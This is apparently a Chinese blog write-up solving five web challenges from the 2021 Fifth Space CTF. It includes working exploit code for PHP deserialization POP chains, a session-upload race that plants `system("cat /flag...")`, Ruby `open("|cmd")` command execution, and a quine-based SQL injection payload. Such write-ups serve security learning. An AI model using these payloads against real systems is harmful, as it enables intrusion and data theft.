第五空间web复现

最新推荐文章于 2024-06-29 00:28:48 发布
最新推荐文章于 2024-06-29 00:28:48 发布
阅读量736 收藏 2
点赞数
分类专栏: CTF训练日记 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unexpectedthing/article/details/120507688
版权

文章目录

pklovecloud

代码显示

 <?php  
include 'flag.php';
class pkshow 
{  
    function echo_name()     
    {          
        return "Pk very safe^.^";      
    }  
} 

class acp 
{   
    protected $cinder;  
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

class ace
{    
    public $filename;     
    public $openstack;
    public $docker; 
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        $this->openstack->neutron = $heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData; 
} 
else 
{ 
    highlight_file(__file__); 
}
?>

一看就是反序列化,我们看到__construct()和 __toString()两个魔法函数,其中我们需要利用到ace类中的file_get_contents()函数,显示出我们的flag.php的内容。

所以我们构造pop链

<?php
class acp 
{   
    protected $cinder;  

    function __construct() 
    {      
        $this->cinder = new ace();//将new pkshow(),改为new ace()
    }  
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
} 
class ace
{    
    public $filename='flag.php';  //给filename赋值flag.php   
    public $openstack;
    public $docker; 
    /*function __constuct(){
        $this->docker=unserialize($docker);
    }*/
    function echo_name()      
    {   
        $this->openstack = unserialize($this->docker);
        //为了绕过后面的判断,我们将两个指针指向同一个变量,这样就可以达到相同。
        $this->openstack->neutron = $heat;
        $this->openstack->nova=$heat;
        if($this->openstack->neutron === $this->openstack->nova)
        {
        $file = "./{$this->filename}";
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    } 
}
$a=new acp();
echo urlencode(serialize($a))

?>

南方师傅的wp,他这个有点复杂,但是可以学一下思想

<?php
class acp
{
    protected $cinder;
    public $neutron;
    public $nova;
    function __construct($cinder)
    {
        $this -> cinder = $cinder;
        $this -> neutron = &$this -> nova;
    }
}

class ace
{
    public $filename = "flag.php";
    public $openstack;
    public $docker;
    function __construct($docker)
    {
        $this -> docker = $docker;
    }
}

echo urlencode(serialize(new acp(new ace(serialize(new acp(""))))));

Easycleanup

 <?php

if(!isset($_GET['mode'])){
    highlight_file(__file__);
}else if($_GET['mode'] == "eval"){
    $shell = $_GET['shell'] ?? 'phpinfo();';
    if(strlen($shell) > 15 | filter($shell) | checkNums($shell)) exit("hacker");
    eval($shell);
}


if(isset($_GET['file'])){
    if(strlen($_GET['file']) > 15 | filter($_GET['file'])) exit("hacker");
    include $_GET['file'];
}


function filter($var): bool{
    $banned = ["while", "for", "\$_", "include", "env", "require", "?", ":", "^", "+", "-", "%", "*", "`"];

    foreach($banned as $ban){
        if(strstr($var, $ban)) return True;
    }

    return False;
}

function checkNums($var): bool{
    $alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    $cnt = 0;
    for($i = 0; $i < strlen($alphanum); $i++){
        for($j = 0; $j < strlen($var); $j++){
            if($var[$j] == $alphanum[$i]){
                $cnt += 1;
                if($cnt > 8) return True;
            }
        }
    }
    return False;
}
?>

首先我们发现既可以用eval命令执行,也可以用include文件包含。

但是eval过滤得太多,我们看到include要稍微简单点

filter函数把很多都过滤了

我们尝试使用phpsession文件包含。

师傅们的脚本

import io
import requests
import threading
url = 'http://challenge-cfd946d2e06b103c.sandbox.ctfhub.com:10800'

def write(session):
    data = {
        'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("cat /flag_is_here_not_are_but_you_find");?>dotasts'
    }
    while True:
        f = io.BytesIO(b'a' * 1024 * 10)
        response = session.post(url,cookies={'PHPSESSID': 'flag'}, data=data, files={'file': ('dota.txt', f)})
def read(session):
    while True:
        response = session.get(url+'?file=/tmp/sess_flag')
        if 'dotasts' in response.text:
            print(response.text)
            break
        else:
            print('retry')

if __name__ == '__main__':
    session = requests.session()
    write = threading.Thread(target=write, args=(session,))
    write.daemon = True
    write.start()
    read(session)

羽师傅的脚本

import requests
import threading
session=requests.session()
sess='yu22x'
url1="http://challenge-13a76fa553bf63aa.sandbox.ctfhub.com:10800"
url2='http://challenge-13a76fa553bf63aa.sandbox.ctfhub.com:10800?file=/tmp/sess_'+sess
data1={
	'PHP_SESSION_UPLOAD_PROGRESS':'<?php echo `cat /f*`;?>'
}
data2={
	'1':'system("cat f*");'
}
file={
	'file':'abc'
}
cookies={
	'PHPSESSID': sess
}
def write():
	while True:
		r = session.post(url1,data=data1,files=file,cookies=cookies)
def read():
	while True:
		r = session.post(url2,data=data2)
		if 'ctfhub' in r.text:
			print(r.text)
threads = [threading.Thread(target=write),
       threading.Thread(target=read)]
for t in threads:
	t.start()

PNG图片转换器

这个题对于现在的我确实不太会做,只有自己看wp

现在fuzz一波,结果发现什么图片马都不得行。

考点是:Ruby open rce

参考文献

https://ruby-doc.org/docs/ruby-doc-bundle/Manual/man-1.4/function.html#open

https://blog.heroku.com/identifying-ruby-ftp-cve

require 'sinatra'
require 'digest'
require 'base64'

get '/' do
  open("./view/index.html", 'r').read()
end

get '/upload' do
  open("./view/upload.html", 'r').read()
end

post '/upload' do
  unless params[:file] && params[:file][:tempfile] && params[:file][:filename] && params[:file][:filename].split('.')[-1] == 'png'
    return "<script>alert('error');location.href='/upload';</script>"
  end
  begin
    filename = Digest::MD5.hexdigest(Time.now.to_i.to_s + params[:file][:filename]) + '.png'
    open(filename, 'wb') { |f|
      f.write open(params[:file][:tempfile],'r').read()
    }
    "Upload success, file stored at #{filename}"
  rescue
    'something wrong'
  end

end

get '/convert' do
  open("./view/convert.html", 'r').read()
end

post '/convert' do
  begin
    unless params['file']
      return "<script>alert('error');location.href='/convert';</script>"
    end

    file = params['file']
    unless file.index('..') == nil && file.index('/') == nil && file =~ /^(.+)\.png$/
      return "<script>alert('dont hack me');</script>"
    end
    res = open(file, 'r').read()
    headers 'Content-Type' => "text/html; charset=utf-8"
    "var img = document.createElement(\"img\");\nimg.src= \"data:image/png;base64," + Base64.encode64(res).gsub(/\s*/, '') + "\";\n"
  rescue
    'something wrong'
  end
end

就是如果传递给open函数的文件名参数是以“|”开头,Ruby会打开一个管道句柄并执行后面的命令
open("|命令部分")
执行ls /
请添加图片描述
读取flag.png
请添加图片描述
base64解码后得到文件名flag_31391,读取这个文件
请添加图片描述
再次访问flag.png
请添加图片描述
解码base64得到flag
请添加图片描述

WebFTP

扫描发现git泄露

然后githack下载不下来

浏览githack⽂件可以看到 https://github.com/wifeat/WebFTP

/Readme/mytz.php中可以执行phpinfo函数

if (isset($_GET['act']) && $_GET['act'] == 'phpinfo'){ 
    phpinfo(); 
    exit();
}

flag就在phpinfo里面。

yet_another_mysql_injection

代码

<?php
include_once("lib.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}

function checkSql($s) {
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}

if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
    $username=$_POST['username'];
    $password=$_POST['password'];
    if ($username !== 'admin') {
        alertMes('only admin can login', 'index.php');
    }
    checkSql($password);
    $sql="SELECT password FROM users WHERE username='admin' and password='$password';";
    $user_result=mysqli_query($con,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes("something wrong",'index.php');
    }
    if ($row['password'] === $password) {
    die($FLAG);
    } else {
    alertMes("wrong password",'index.php');
  }
}

if(isset($_GET['source'])){
  show_source(__FILE__);
  die;
}
?>

首先审计代码,我们需要username=admin,password=数据库中的password相同

quine可以返回一个自身的sql查询。

参考链接:https://www.shysecurity.com/post/20140705-SQLi-Quine

脚本

def quine(data, debug=True):
    if debug: print(data)
    data = data.replace('@@',"REPLACE(REPLACE(@@,CHAR(34),CHAR(39)),CHAR(64),@@)")
    blob = data.replace('@@','"@"').replace("'",'"')
    data = data.replace('@@',"'"+blob+"'")
    if debug: print(data)
    return data

result = quine("'UNION/**/SELECT/**/@@/**/AS/**/atao#")

运行一下,POST传参就可以得到flag。

Z3eyOnd
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web_3:从Adobe XD Design到Web
05-25
CSS允许我们设置颜色、字体、边距、布局等样式属性,使得设计中的色彩搭配、字体选择和空间布局得以在网页上重现。而JavaScript则可以实现用户交互,如响应式导航、动画效果和表单验证等,进一步提升用户体验。 在...
thinkphp5 开发通用后台管理系统,后台UI使用beyond admin
11-01
ThinkPHP5是基于PHP的轻量级框架,其5.0版本引入了更多的现代化特性,如命名空间、依赖注入、中间件等,提高了代码的可维护性和扩展性。它的路由系统允许开发者灵活地定义URL模式,使得API设计更加友好。此外,TP5...
2021第五空间线上赛web wp
cosmoslin的博客
09-18 647
pklovecloud <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __c
[第五空间 2021]yet_another_mysql_injection wp
Leaf_initial的博客
07-07 405
在这个语句中,攻击者使用了 HEX 编码来表示 LIKE 运算符右侧的字符串,这个字符串实际上是 “unique_detect” 的 HEX 编码。由于白名单只允许使用特定的字符或字符串,而不允许使用特定的运算符或操作,因此攻击者可以使用这种方法来绕过白名单的限制,从而执行恶意的操作。白名单是一种更安全的防御措施,它会检查用户输入中是否包含一些特定的字符或字符串,并只允许这些字符或字符串被用于查询。都没有被过滤,可以编写脚本爆破密码 ,我这里直接找了一个师傅的脚本。直接访问,弱口令试一试就过了,账号。
第五空间yet_another_mysql_injection
最新发布
2301_80113257的博客
06-29 249
这时用quine注入。核心思想就是让sql语句执行的结果等于sql语句本身,来绕过这个验证。注出来fc3e129bd11f8e7ecf9fc816:eg1b5c4,但是密码显示错误。<>(大于小于号) -> least(),greatest()这题可以用上面链接中的脚本生成这个payload。根据提示访问source得到后端代码。结果和password是一样的!猜测password。先看最终的password。执行内层REPLACE。空格 -> /**/password变成。
[第五空间 2021]yet_another_mysql_injection
bossDDYY的博客
11-10 1553
打开题目 查看源码 发现可用信息。,试试登录,返回flag。
CTFHUB 2021-第五空间 yet_another_mysql_injection
Jay17的博客
07-05 913
CTFHUB 2021-第五空间 yet_another_mysql_injection
俄罗斯方块h5源码下载
03-02
H5是HTML5的简称,是HTML语言的第五次重大修订,增加了许多新的标签和API,使网页开发者可以创建更具交互性和多媒体效果的网页应用,而无需依赖Flash等插件。对于游戏开发来说,H5可以实现高效、流畅的游戏体验,且...
《网络测试和故障诊断 第二版》第七章课件介绍.pdf
05-09
在《网络测试和故障诊断 第二版》的第七章中,主要探讨了应用层测试和故障诊断的相关知识,这是网络管理与维护中的一个重要环节。应用层是OSI七层模型的最高层,它直接与用户交互,因此其性能和稳定性直接影响到用户...
YouDianCMS-PHP
06-25
全面开放系统前端+后台的源代码,解除了开发者和用户的后顾之忧,完全支持二次开发,没有预留后门,代码使用权自己轻松掌握2、五站合一:电脑站、手机站、微信、APP、小程序五站合一,共用空间,数据同步,不用维护...
2020年第五空间.zip
07-20
2020年第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp。
php对象与反序列化浅记
我的数字盆栽
10-25 73
关于php反序列化的表层原理和4道例题的解答
[第五空间 2021]pklovecloud slackmoon的WriteUp
m0_61155226的博客
06-05 685
NSSCTF[第五空间 2021]pklovecloud
2020“第五空间”wp-pwn-twice
weixin_45209963的博客
06-25 755
这次第五空间总算不是第500空间了… 题难度还行。pwn只做了一个twice,不过好歹是正式比赛第一次做出来pwn…放wp吧。 老规矩,先checksec一波 64位,开了canary和nx。上IDA。 main函数主要就是一个循环 sub_4007A9是这样的 a1就是传入的nCount(初值为0) 。结合主函数的循环,可以知道整个循环只能跑两次。 第二次执行完后返回0,就跳出循环了。 整个的函数作用大体上就是向s数组中读v3个字节。 sub_40076D长这样 第一次返回89,第二次返回112。
CTF 反序列化入门例题wp
qq_47168481的博客
10-20 2609
最近有再看反序列化,尝试着学一下比赛中的反序列化: 源码: <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova;
2021 第五空间 ctf wp
qq_45603443的博客
09-23 3051
2021 第五空间 ctf Misc签到alpha10BabyMiCryptoECCReverseuniappPwnbountyhunterCrazyVMWebEasyCleanuppklovecloudPNG图⽚转换器WebFTPyet_another_mysql_injection Misc 签到 flag{welcometo5space} alpha10 分离得到两个图⽚,⼀个jpg⼀个png, 两张图⼀样,想到可能是盲⽔印, https://github.com/chishaxie/BlindWa
第三届第五空间网络安全大赛-选拔赛-部分Writeup
末初的CSDN博客
09-17 2027
文章目录MISC签到alpha10BabyMimuzikoWEBWebFTPPNG图片转换器pklovecloudEasyCleanupyet_another_mysql_injection MISC 签到 flag{welcometo5space} alpha10 BabyMi muziko WEB WebFTP 目录扫描发现git泄露 使用GitHack尝试还原代码 发现无法还原源代码,但是发现了几个可以正常访问的文件,其中最为有用的就是这个探针:/Readme/mytz.php
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值